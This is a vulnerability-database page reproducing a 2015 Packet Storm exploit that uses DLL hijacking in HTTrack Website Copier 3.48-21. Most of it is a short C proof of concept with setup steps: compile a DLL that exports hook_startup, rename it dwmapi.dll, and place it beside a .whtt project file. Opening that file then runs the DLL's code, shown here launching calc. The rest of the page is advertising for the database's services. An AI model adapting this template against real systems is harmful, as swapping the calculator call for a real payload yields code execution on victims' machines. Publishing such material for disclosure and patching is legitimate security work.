Lucene search
K

HTTrack Website Copier 3.48-21 DLL Hijacking

🗓️ 29 Mar 2015 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

HTTrack Website Copier v3.48-21 DLL Hijacking exploit. Local exploits tested on WinXp/Windows 7 Pro. Author: TUNISIAN CYBE

Code
`#[+] Author: TUNISIAN CYBER  
#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking  
#[+] Date: 28-03-2015  
#[+] Type: Local Exploits  
#[+] Vendor: https://httrack.com/page/2/fr/index.html  
#[+] Tested on: WinXp/Windows 7 Pro  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
#[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that  
# the 2 files are in the same dir.  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
DllExport void hook_startup() { exp(); }  
  
int exp()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2015 00:00Current
0.5Low risk
Vulners AI Score0.5
18